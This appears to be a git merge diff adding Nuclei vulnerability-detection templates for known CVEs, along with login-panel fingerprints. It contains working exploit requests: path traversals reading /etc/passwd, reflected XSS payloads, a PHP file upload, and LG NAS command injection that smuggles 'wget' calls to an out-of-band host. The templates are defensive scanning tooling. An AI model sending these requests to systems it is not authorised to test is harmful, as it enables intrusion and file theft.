Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
a4e9469544
|
@ -94,4 +94,6 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
|
||||||
|
|
||||||
## Tip from us😇
|
## Tip from us😇
|
||||||
|
|
||||||
**Nuclei** outcomes are only as excellent as **template matchers💡**
|
- **Nuclei** outcomes are only as excellent as **template matchers💡**
|
||||||
|
- Declare at least two matchers to reduce false positive
|
||||||
|
- Avoid matching words reflected in the URL to reduce false positive
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2009-5114
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/36994
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||||
|
tags: cve,cve2009,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2012-0991
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenEMR 4.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/36650
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2012-0991
|
||||||
|
tags: cve,cve2012,lfi,openemr
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2014-4535
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
reference: |
|
||||||
|
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||||
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "'></script><script>alert(document.domain)</script>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2014-4536
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
reference: |
|
||||||
|
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||||
|
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"></script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2015-3648
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ResourceSpace - Local File inclusion
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
description: ResourceSpace is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||||
|
reference: |
|
||||||
|
- https://vulners.com/cve/CVE-2015-3648/
|
||||||
|
- https://www.securityfocus.com/bid/75019
|
||||||
|
tags: cve,cve2015,lfi,resourcespace
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2015-6544
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: iTop XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544
|
||||||
|
tags: cve,cve2015,xss,itop
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2015-8349
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SourceBans XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349
|
||||||
|
tags: cve,cve2015,xss,sourcebans
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2016-7981
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SPIP 3.1.2 XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
|
||||||
|
tags: cve,cve2016,xss,spip
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"></script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2017-15647
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: FiberHome - Directory Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/44054
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2017-15647
|
||||||
|
tags: cve,cve2017,lfi,router
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2017-6090
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PhpCollab (unauthenticated) Arbitrary File Upload
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
tags: cve,cve2017,phpcollab,rce,fileupload
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- | # REQUEST 1
|
||||||
|
POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
|
||||||
|
|
||||||
|
-----------------------------154934846911423734231554128137
|
||||||
|
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
|
||||||
|
Content-Type: application/x-php
|
||||||
|
|
||||||
|
<?php echo md5('phpcollab_rce');?>
|
||||||
|
|
||||||
|
-----------------------------154934846911423734231554128137--
|
||||||
|
|
||||||
|
- | # REQUEST 2
|
||||||
|
GET /logos_clients/1.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "48dbd2384cb6b996fa1e2855c7f0567f"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: CVE-2018–10818
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LG NAS Devices - Remote Code Execution (Unauthenticated)
|
||||||
|
author: gy741
|
||||||
|
severity: critical
|
||||||
|
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
|
||||||
|
reference: |
|
||||||
|
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||||
|
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
|
||||||
|
tags: cve,cve2018,lg-nas,rce,oob
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /system/sharedir.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: curl/7.58.0
|
||||||
|
Accept: */*
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
&uid=10; wget http://{{interactsh-url}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /en/php/usb_sync.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: curl/7.58.0
|
||||||
|
Accept: */*
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
&act=sync&task_number=1;wget http://{{interactsh-url}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: CVE-2019-12276
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GrandNode 4.40 - Path Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40.
|
||||||
|
reference: |
|
||||||
|
- https://security401.com/grandnode-path-traversal/
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2019-12276
|
||||||
|
tags: cve,cve2019,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"
|
||||||
|
headers:
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2019-14312
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Aptana Jaxer 1.0.3.4547 - Local File inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI.
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/47214
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2019-14312
|
||||||
|
tags: cve,cve2019,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2020-11455
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LimeSurvey 4.1.11 - Path Traversal
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
|
||||||
|
reference: |
|
||||||
|
- https://www.exploit-db.com/exploits/48297
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2020-11455
|
||||||
|
tags: cve,cve2020,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -3,7 +3,7 @@ id: CVE-2020-13927
|
||||||
info:
|
info:
|
||||||
name: Unauthenticated Airflow Experimental REST API
|
name: Unauthenticated Airflow Experimental REST API
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: medium
|
severity: critical
|
||||||
tags: cve,cve2020,apache,airflow,unauth
|
tags: cve,cve2020,apache,airflow,unauth
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
@ -17,4 +17,4 @@ requests:
|
||||||
- '"dag_run_url":'
|
- '"dag_run_url":'
|
||||||
- '"dag_id":'
|
- '"dag_id":'
|
||||||
- '"items":'
|
- '"items":'
|
||||||
condition: and
|
condition: and
|
||||||
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2020-26153
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Event Espresso Core-Reg XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
|
||||||
|
reference: |
|
||||||
|
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
|
||||||
|
tags: cve,cve2020,xss,wordpress,wp-plugin
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"/></script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2020-27735
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Wing FTP's Web Interface XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735
|
||||||
|
tags: cve,cve2020,xss,wing-ftp
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2020-9036
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Jeedom through 4.0.38 allows XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
reference: |
|
||||||
|
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
|
||||||
|
tags: cve,cve2020,xss,jeedom
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: dnssec-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DNSSEC Detection
|
||||||
|
description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
tags: dns,dnssec
|
||||||
|
reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
|
||||||
|
|
||||||
|
dns:
|
||||||
|
- name: "{{FQDN}}"
|
||||||
|
type: DS
|
||||||
|
class: inet
|
||||||
|
recursion: true
|
||||||
|
retries: 3
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "IN\tDS\t(.+)"
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: camunda-login-panel
|
||||||
|
info:
|
||||||
|
name: Camunda Login panel
|
||||||
|
author: alifathi-h1
|
||||||
|
severity: info
|
||||||
|
description: Default Credentials of demo:demo on Camunda application.
|
||||||
|
reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
|
||||||
|
tags: camunda,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/app/welcome/default/#!/login'
|
||||||
|
- '{{BaseURL}}/camunda/app/welcome/default/#!/login'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Camunda Welcome"
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '<footer cam-widget-footer version="v([0-9.]+)"'
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: cerebro-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cerebro Panel
|
||||||
|
author: huowuzhao,elder tao
|
||||||
|
severity: high
|
||||||
|
reference: https://github.com/lmenezes/cerebro
|
||||||
|
tags: panel,cerebro
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/login"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Cerebro</title>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "<small>([a-z0-9.]+)</small>"
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: cisco-sendgrid
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco ServiceGrid
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
|
||||||
|
tags: panel,cisco
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/pages/sdcall/Login.jsp'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '<div class="top\-margin">Version ([0-9.]+)<\/div>'
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: clearpass-policy-manager
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ClearPass Policy Manager - Aruba Networks
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
|
||||||
|
tags: panel,aruba
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/tips/tipsLogin.action'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>ClearPass Policy Manager - Aruba Networks</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: dell-openmanager-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Dell OpenManage Switch Administrator
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22
|
||||||
|
tags: panel,dell
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
- '{{BaseURL}}/config/authentication_page.htm'
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Dell OpenManage Switch Administrator</title>'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<TITLE>Log In</TITLE>'
|
||||||
|
- 'device/logOff_up_menu1.htm'
|
||||||
|
condition: and
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: f-secure-policy-manager
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: F-Secure Policy Manager Server
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22
|
||||||
|
tags: login,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>F-Secure Policy Manager Server</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: glpi-authentication
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GLPI - Authentification
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22
|
||||||
|
tags: panel,auth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>GLPI - Authentication</title>'
|
||||||
|
- 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: gxd5-pacs-connexion-utilisateur
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GXD5 Pacs Connexion utilisateur
|
||||||
|
author: dhiyaneshDK
|
||||||
|
